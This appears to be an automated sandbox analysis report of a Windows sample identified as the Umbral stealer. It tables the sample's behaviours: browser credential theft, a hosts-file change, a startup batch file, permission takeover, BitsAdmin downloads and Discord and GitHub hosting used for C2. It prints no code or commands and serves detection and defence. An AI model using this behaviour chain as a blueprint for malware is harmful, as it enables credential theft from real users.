Analysis Overview
SHA256
ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093
Threat Level: Known bad
The file test.exe was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
Credentials from Password Stores: Credentials from Web Browsers
Possible privilege escalation attempt
Blocklisted process makes network request
Download via BitsAdmin
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Modifies file permissions
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Network Configuration Discovery: Internet Connection Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Script User-Agent
Suspicious use of FindShellTrayWindow
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Detects videocard installed
Enumerates system info in registry
Kills process with taskkill
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 00:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 00:56
Reported
2024-08-09 00:59
Platform
win11-20240802-en
Max time kernel
106s
Max time network
157s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
